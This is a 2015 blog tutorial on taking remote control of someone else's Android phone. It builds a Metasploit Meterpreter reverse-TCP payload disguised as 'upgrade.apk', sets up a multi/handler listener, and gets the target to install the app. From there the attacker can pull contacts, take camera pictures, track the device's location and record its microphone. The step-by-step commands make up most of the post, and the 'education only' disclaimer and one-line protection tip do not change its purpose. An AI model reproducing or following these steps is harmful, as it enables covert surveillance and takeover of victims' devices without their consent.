Saturday 18 July 2015

Hack Remotely Control Any Android Device Using Kali Linux or Ubuntu ( msfpayload )

Hack Remotely Control Any Android Device Using Kali Linux or Ubuntu  ( msfpayload ) :

 

This  post will teach you how to Hack Android devices to Control them Remotely.Now days every single person uses android device, people love and easily attract to android device because of its features and functionality but. There are soo many third party spy software's in market but some of them are fake and some of them not works properly.but today i will show you how to hack android device remotely.But please remember don't use it as illegally to exploit someone privacy who not belongs to you....

What actually are we doing:

In this tutorial, we are going to create a deploy application using Kali Linux Metasploit which should be installed on the target android device. When installed successfully, we can gain full access to that device.

Prerequisites :

1 ]  A PC or Laptop running on Linux Operating System .If you didn't installed or you don't
know how to run kali linux please goto my post How to install kali linux or how to run linux live( without installing ).or if you are running windows then goto my post How to run kali linux on virtual box.
2] Active Internet Connection( It should be good connection not like dialup ).
3] An Android device to exploit.

Features of this HACK :

  • Get contacts from remote android device.
  • Click snaps using front or back camera.
  • Get real-time pin point location.
  • Record real-time sound by using microphone of android device.
  • and lots more........

So , lets start :

Step1 : Open the terminal in Linux , type the below code and press enter.
:~#    msfpayload -p android/meterpreter/reverse_tcp LHOST=youripaddress LPORT=XXXX (anyport) R > upgrade.apk
If you don't know your ip address, simply open another terminal and type "ifconfig" without quotes. You can see your ip address beside wlan0 it would be something like 192.168.x.x (Note: This will show you internal ip ( lan ip)  ).

Step2 : Now goto the
home folder.Find your newly created deploy application upgrade.apk will be automatically generated.
 
Step3 : Now open the listener by opening another terminal and type the below code.
:~#   msfconsole

[ Now metasploit is loading it will take some time approx. 55 seconds. ]

Step4 : When metasploit successfully loaded type the below code.

> use exploit/multi/handler
 
> set payload android/meterpreter/reverse_tcp
> set LHOST 192.168.XXX.XXX (the same ip address you entered in step1).
> set LPORT XXXX (the same port you used in step1).
exploit

Now the console starts listening to 192.168.xxx.xxx at port your_port.

Step5 : Now send the upgrade.apk from home folder to the target android device.

Step6 : Install the upgrade.apk on the target device and when the device is connected to the internet open the app.

Step7 : As soon as you open the app in the device, you can see the connected device in console terminal.


Step8  : Now you have full access to the device from the terminal. Just type help or and you will see list of  all the available commands.
 
[ Note : some of you got errors like starting to 0.0.0.0 at port 8080 something like this ,it means you are trying to use your dynamic ip ( and your router is DHCP enabled ) ,and this tutorial will works only on your lan network.If you want to do this on anywhere(static ip) just use your static public ip,if you are confused how to know static ip then please check my post on static and dynamic ip]

[ Note : Don't hack any  device who not belongs to you,it is illegal.If you did this , im not responsible.stealing someone information without permission is crime .It's for education purpose only. ]

How to save yourself form these type of hacks :


From this tutorial you may have understood how easy it is to hack android devices. So to protect your self from being hacked you should check the app thoroughly before installing it.Try to avoid unknown apps.check its publisher or developer.Install trusted developer apps only......

 ----------------------------------------------------------------------------------------------------------------------
[ Any questions : ask in comment box ]

Share this

0 Comment to "Hack Remotely Control Any Android Device Using Kali Linux or Ubuntu ( msfpayload )"

Post a Comment